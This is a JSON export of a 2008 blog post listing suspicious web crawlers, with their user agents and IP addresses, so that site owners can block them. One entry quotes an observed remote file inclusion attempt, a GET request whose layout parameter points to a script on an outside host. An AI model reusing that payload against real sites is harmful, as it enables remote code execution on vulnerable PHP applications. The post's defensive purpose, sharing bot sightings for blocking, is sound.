{"id":11,"date":"2008-07-23T20:56:47","date_gmt":"2008-07-24T00:56:47","guid":{"rendered":"http:\/\/www.compdigitec.com\/labs\/?p=11"},"modified":"2008-07-23T20:56:47","modified_gmt":"2008-07-24T00:56:47","slug":"very-suspicious-robots","status":"publish","type":"post","link":"http:\/\/www.compdigitec.com\/labs\/2008\/07\/23\/very-suspicious-robots\/","title":{"rendered":"Very Suspicious Internet Robots"},"content":{"rendered":"<p>So far we have come across some very strange and suspicious robots hitting our site; we have identified them for you here. Feel free to use this information to block these suspicious robots from hitting\/scraping your website.<\/p>\n<ul>\n<li><strong>OOZBOT\/0.17 (&#8211;; http:\/\/www.setooz.com\/oozbot.html; pvvpr at iiit dot ac dot in)<\/strong><\/li>\n<\/ul>\n<p>This bot tried to access only the <a href=\"\/\">home page<\/a>. It&#8217;s IP is 67.215.230.15 and tried to access our home page on 2008-07-21 06:00:57.<\/p>\n<ul>\n<li><strong>libwww-perl\/5.805, <\/strong><strong>libwww-perl\/5.65, <\/strong><strong>libwww-perl\/5.79<\/strong><\/li>\n<\/ul>\n<p>This bot, written in perl, tried to do an exploit of some sort by trying to GET <em>\/index.php?layout=http:\/\/kingkool2.free.fr\/ezupload\/ips.txt?<\/em>. IPs include: 203.97.119.88, 75.101.157.249, 207.57.2.143, 89.111.176.110 and 222.233.52.18. Block the user-agents in robots.txt.<\/p>\n<ul>\n<li><strong>WebAlta Crawler\/2.0 (http:\/\/www.webalta.net\/ru\/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)<\/strong><\/li>\n<\/ul>\n<p>This &#8220;russian&#8221; bot appears to follow links throughout the site between intervals of 2 minutes. Blocked permanently because of an unresolvable URL. Some Google searches reveal that it follows up behind the scrapers.<\/p>\n<ul>\n<li><strong>Mozilla\/4.0 (compatible; MSIE 7.0;\u00a0 Windows NT 5.2)<br \/>\n<\/strong><\/li>\n<\/ul>\n<p>This bot suspiciously scrapes all important pages at the rate of several pages per seconds. According to <a href=\"http:\/\/johannburkard.de\/blog\/www\/spam\/cyveillance-shows-up-and-is-shown-the-door.html\" rel=\"nofollow\">this post<\/a>, it looks like that this bot does dirty work for the RIAA and the MPAA. Block user agent at this IP: 38.100.41.*<\/p>\n<p>Good luck defeating the spambots and badbots out there!<\/p>","protected":false},"excerpt":{"rendered":"<p>So far we have come across some very strange and suspicious robots hitting our site; we have identified them for you here. Feel free to use this information to block these suspicious robots from hitting\/scraping your website. OOZBOT\/0.17 (&#8211;; http:\/\/www.setooz.com\/oozbot.html; pvvpr at iiit dot ac dot in) This bot tried to access only the home [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[14],"tags":[21,16,18,19,865,24,17,25,20,22,23],"_links":{"self":[{"href":"http:\/\/www.compdigitec.com\/labs\/wp-json\/wp\/v2\/posts\/11"}],"collection":[{"href":"http:\/\/www.compdigitec.com\/labs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.compdigitec.com\/labs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.compdigitec.com\/labs\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.compdigitec.com\/labs\/wp-json\/wp\/v2\/comments?post=11"}],"version-history":[{"count":0,"href":"http:\/\/www.compdigitec.com\/labs\/wp-json\/wp\/v2\/posts\/11\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.compdigitec.com\/labs\/wp-json\/wp\/v2\/media?parent=11"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.compdigitec.com\/labs\/wp-json\/wp\/v2\/categories?post=11"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.compdigitec.com\/labs\/wp-json\/wp\/v2\/tags?post=11"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}